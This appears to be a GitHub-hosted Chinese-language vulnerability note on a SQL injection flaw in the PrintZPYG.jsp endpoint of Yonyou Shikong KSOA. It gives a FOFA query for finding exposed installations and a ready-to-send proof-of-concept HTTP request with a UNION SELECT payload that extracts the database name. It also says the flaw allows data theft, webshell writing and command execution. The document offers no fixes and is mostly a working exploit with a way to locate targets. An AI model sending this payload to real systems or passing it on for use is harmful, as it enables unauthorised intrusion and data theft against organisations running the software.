Skip to content

Latest commit

 

History

History
22 lines (14 loc) · 709 Bytes

用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md

File metadata and controls

22 lines (14 loc) · 709 Bytes

用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞

用友时空KSOA接口 /kp//PrintZPYG.jsp 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

fofa

app="用友-时空KSOA"

poc

GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13,14+--+ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

image-20240729163059414